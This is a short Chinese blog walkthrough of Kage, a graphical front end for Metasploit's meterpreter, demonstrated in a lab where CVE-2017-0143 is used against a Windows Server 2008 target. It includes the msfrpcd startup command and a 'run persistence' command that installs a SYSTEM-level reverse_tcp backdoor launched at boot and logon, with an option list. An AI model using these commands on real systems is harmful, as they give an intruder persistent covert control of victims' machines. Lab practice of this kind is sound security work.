可视化meterpreter操作> "Kage"

Kage

一个在GitHub上可视化操作meterpreter的项目

https://github.com/Zerx0r/Kage

支持Linux和Windows 这里使用Windows版本演示

需要先打开metasploit的RPC功能

msfrpcd -U msf -P msfpass -S -f

用户名 msf 密码 msfpass 端口55553

连接上后是工作台页面 可视化的Payload选择 的确比msf直观一些

靶机 WindowsServer2008 控制端Kali 管理端Windows10

使用CVE-2017-0143测试

这种三年的老漏洞 到现在依然很好使

回到Kage创建监听

注意Payload的系统位数 一定要和生成的Payload相同!

现在回到 MSF去建立一个后门连接

run persistence -S -U -X -i 5 -p 端口 -r 地址 -P windows/x64/meterpreter/reverse_tcp

TIPS

-A 自动启动一个匹配的exploit / multi / handler来连接到代理
-L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P 有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S 作为服务自动启动代理程序(具有SYSTEM权限)
-T 要使用的备用可执行模板
-U 用户登录时自动启动代理
-X 系统引导时自动启动代理程序
-h 这个帮助菜单
-i 每次连接尝试之间的时间间隔(秒)
-p 运行Metasploit的系统正在侦听的端口
-r 运行Metasploit监听连接的系统的IP

继承了SYSTEM权限的会话

但是有一说一 这个功能实在是...羸弱 要啥没啥 还没十年前的远控好使

而且这个图形化做的 响应速度 不尽人意 操作响应速度也很一般

 

发表评论

电子邮件地址不会被公开。必填项已用 * 标注